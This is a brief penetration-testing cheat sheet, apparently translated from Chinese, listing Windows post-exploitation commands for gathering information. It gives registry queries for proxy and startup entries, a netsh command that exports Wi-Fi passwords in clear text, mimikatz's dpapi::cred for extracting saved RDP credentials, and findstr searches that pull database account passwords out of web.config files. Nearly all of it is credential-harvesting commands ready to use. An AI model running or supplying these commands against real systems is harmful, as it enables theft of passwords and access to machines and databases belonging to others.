Network penetration - registry information gathering
Powershell registry to collect
https://github.com/3gstudent/ListInstalledPrograms
Get System Agent:
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
Gets startup items
reg query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get wifi password
netsh wlan export profile interface=WLAN(看实际情况) key=clear folder=C:\
mimikatz export RDP password
mimikatz 的 dpapi::cred
Run in the root directory
dir /b /s web.config >> tmps.logs
According to the above-known database connection account password field names, we can directly use the findstr batch fetching sa password in the specified web directory
findstr /c:"User Id=" /c:"Password=" /si web.config >> C:/inetpub/tmps.logs